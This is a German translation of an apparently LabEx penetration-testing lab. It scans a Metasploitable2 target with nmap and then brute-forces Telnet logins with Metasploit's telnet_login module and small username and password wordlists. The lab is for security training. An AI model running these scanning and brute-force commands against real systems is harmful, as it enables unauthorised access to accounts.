Telnet-Dienst-Schwachstelle mit Metasploit ausnutzen

NmapNmapBeginner
Jetzt üben

💡 Dieser Artikel wurde von AI-Assistenten übersetzt. Um die englische Version anzuzeigen, können Sie hier klicken

Einführung

In diesem Lab werden wir lernen, wie man die Schwachstelle des Telnet-Dienstes ausnutzt und einen Penetrationstest durchführt. Das Szenario beinhaltet die Verwendung eines Kali Linux-Rechners als Angreifer und einer Metasploitable2-Virtual Machine als Zielrechner. Das Ziel ist es, den Zielrechner auf Schwachstellen zu scannen, die Schwachstelle des Telnet-Dienstes zu identifizieren und sie mit dem Metasploit Framework auszunutzen.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL nmap(("Nmap")) -.-> nmap/NmapGroup(["Nmap"]) wireshark(("Wireshark")) -.-> wireshark/WiresharkGroup(["Wireshark"]) hydra(("Hydra")) -.-> hydra/HydraGroup(["Hydra"]) nmap/NmapGroup -.-> nmap/installation("Installation and Setup") nmap/NmapGroup -.-> nmap/port_scanning("Port Scanning Methods") nmap/NmapGroup -.-> nmap/host_discovery("Host Discovery Techniques") nmap/NmapGroup -.-> nmap/target_specification("Target Specification") nmap/NmapGroup -.-> nmap/timing_performance("Timing and Performance") nmap/NmapGroup -.-> nmap/service_detection("Service Detection") nmap/NmapGroup -.-> nmap/scripting_basics("Scripting Engine Basics") wireshark/WiresharkGroup -.-> wireshark/commandline_usage("Command Line Usage") hydra/HydraGroup -.-> hydra/installation("Installation and Setup") subgraph Lab Skills nmap/installation -.-> lab-416133{{"Telnet-Dienst-Schwachstelle mit Metasploit ausnutzen"}} nmap/port_scanning -.-> lab-416133{{"Telnet-Dienst-Schwachstelle mit Metasploit ausnutzen"}} nmap/host_discovery -.-> lab-416133{{"Telnet-Dienst-Schwachstelle mit Metasploit ausnutzen"}} nmap/target_specification -.-> lab-416133{{"Telnet-Dienst-Schwachstelle mit Metasploit ausnutzen"}} nmap/timing_performance -.-> lab-416133{{"Telnet-Dienst-Schwachstelle mit Metasploit ausnutzen"}} nmap/service_detection -.-> lab-416133{{"Telnet-Dienst-Schwachstelle mit Metasploit ausnutzen"}} nmap/scripting_basics -.-> lab-416133{{"Telnet-Dienst-Schwachstelle mit Metasploit ausnutzen"}} wireshark/commandline_usage -.-> lab-416133{{"Telnet-Dienst-Schwachstelle mit Metasploit ausnutzen"}} hydra/installation -.-> lab-416133{{"Telnet-Dienst-Schwachstelle mit Metasploit ausnutzen"}} end

Starten der Lab-Umgebung

In diesem Schritt werden wir die Lab-Umgebung starten, die den Kali Linux-Container und die Metasploitable2-Virtual Machine umfasst.

  1. Öffnen Sie ein xfce-Terminal auf der LabEx-Hostmaschine und starten Sie das Metasploitable2-Ziel, indem Sie den folgenden Befehl ausführen:
sudo virsh start Metasploitable2

Warten Sie, bis die Zielmaschine gestartet ist. Dies kann 1-3 Minuten dauern.

  1. Testen Sie die Konnektivität zur Zielmaschine, indem Sie sie per Ping testen:
ping 192.168.122.102

Drücken Sie Ctrl+C, um den Ping zu stoppen.

  1. Starten Sie den Kali Linux-Container und treten Sie in die bash-Umgebung ein, indem Sie folgenden Befehl ausführen:
docker run -ti --network host b5b709a49cd5 bash
  1. Testen Sie innerhalb des Kali-Containers die Netzwerkverbindung zur Zielmaschine:
ping 192.168.122.102

Drücken Sie Ctrl+C, um den Ping zu stoppen.

Nun laufen sowohl die Angriffsmaschine als auch die Zielmaschine, und Sie können mit dem Penetrationstest beginnen.

Hinweis: Wenn Sie versehentlich die aktuelle bash-Umgebung verlassen, wird der Kali-Container automatisch gestoppt. Sie können erneut docker run -ti --network host b5b709a49cd5 bash auf der Hostmaschine ausführen, um einen neuen Kali-Container zu starten und in die bash-Umgebung einzutreten, um das Experiment fortzusetzen.

Durchführung eines Schwachstellenscans

In diesem Schritt werden wir Nmap verwenden, um die Zielmaschine auf offene Ports und Dienste zu scannen.

Zunächst starten Sie die PostgreSQL-Datenbank, da Metasploit diese zur Datenspeicherung benötigt:

service postgresql start
msfdb init
cd ~
msfconsole

Innerhalb der Metasploit-Konsole führen Sie den Nmap-Scan gegen die Zielmaschine aus:

nmap -sV -T4 192.168.122.102

Die Option -sV scannt offene Ports und zeigt detaillierte Portinformationen an, während -T4 die Scan-Timing-Richtlinie festlegt (0-5, höhere Werte sind schneller, aber lauter).

Analyse der Scanergebnisse

In diesem Schritt werden wir die Nmap-Scanergebnisse analysieren, um den anfälligen Telnet-Dienst zu identifizieren.

Die Ausgabe des Nmap-Scans zeigt, dass der Telnet-Dienst auf Port 23 mit der Banner-Nachricht "Linux telnetd" läuft. Lassen Sie uns nach dem entsprechenden Metasploit-Modul suchen:

search scanner/telnet

Verwenden Sie das Modul auxiliary/scanner/telnet/telnet_login:

use auxiliary/scanner/telnet/telnet_login

Zeigen Sie die Moduloptionen an:

show options

Die erforderliche Option ist RHOSTS, die den/die Zielhost(s) angibt.

Drücken Sie Ctrl+D, um die Metasploit-Konsole zu beenden, und starten Sie dann die Prüfung

Vorbereitung des Benutzernamen- und Passwort-Wörterbuchs

In diesem Schritt werden wir die Dateien für das Benutzernamen- und Passwort-Wörterbuch für einen Brute-Force-Anmeldeangriff vorbereiten.

Öffnen Sie ein neues Terminal und verbinden Sie sich mit dem Kali-Container:

docker run -ti --network host b5b709a49cd5 bash

Erstellen Sie eine Datei username.txt im Verzeichnis / mit den folgenden Benutzernamen:

123456
admin
msfadmin
root
kali

Erstellen Sie eine weitere Datei password.txt im Verzeichnis / mit den folgenden Passwörtern:

abc123
1234
123456
root
msfadmin
admin
toor

Diese Dateien werden als Benutzernamen- und Passwort-Wörterbücher für den Brute-Force-Angriff verwendet.

Konfiguration des Metasploit-Moduls

In diesem Schritt werden wir das Metasploit-Modul mit dem Zielhost, dem Benutzernamen-Wörterbuch und dem Passwort-Wörterbuch konfigurieren.

Zunächst sollten Sie, wenn Sie nicht in der Metasploit-Konsole sind, die Metasploit-Konsole starten:

cd ~
msfconsole

Verwenden Sie das Modul auxiliary/scanner/telnet/telnet_login:

use auxiliary/scanner/telnet/telnet_login

Legen Sie den Zielhost fest:

set RHOSTS 192.168.122.102

Legen Sie die Datei für das Benutzernamen-Wörterbuch fest:

set USER_FILE /username.txt

Legen Sie die Datei für das Passwort-Wörterbuch fest:

set PASS_FILE /password.txt

Abschließend führen Sie den Exploit aus:

exploit

Metasploit beginnt, verschiedene Benutzernamen- und Passwortkombinationen aus den angegebenen Wörterbüchern zu testen. Wenn gültige Anmeldeinformationen gefunden werden, werden sie in Grün angezeigt.

In diesem Fall sind die gültigen Anmeldeinformationen msfadmin/msfadmin.

Drücken Sie Ctrl+D, um die Metasploit-Konsole zu beenden, und starten Sie dann die Prüfung

Zusammenfassung

In diesem Lab haben wir gelernt, wie man Schwachstellen des Telnet-Dienstes mithilfe des Metasploit-Frameworks ausnutzt. Wir haben begonnen, indem wir die Lab-Umgebung mit einem Kali Linux-Angriffssystem und einer Metasploitable2-Zielmaschine eingerichtet haben. Anschließend haben wir einen Schwachstellenscan mit Nmap durchgeführt, um den offenen Telnet-Dienst zu identifizieren. Danach haben wir die Benutzernamen- und Passwort-Wörterbücher vorbereitet und das Metasploit-Modul mit dem Zielhost und den Wörterbuchdateien konfiguriert. Schließlich haben wir den Exploit ausgeführt und erfolgreich die Telnet-Anmeldeinformationen per Brute-Force ermittelt.

Dieses Lab hat praktische Erfahrungen in der Penetrationstests, Schwachstellenscans und der Nutzung des Metasploit-Frameworks zum Ausnutzen von Schwachstellen vermittelt. Es hat die Wichtigkeit sicherer Passwortpraktiken und die potenziellen Risiken der Verwendung schwacher oder leicht erratbarer Anmeldeinformationen aufgezeigt.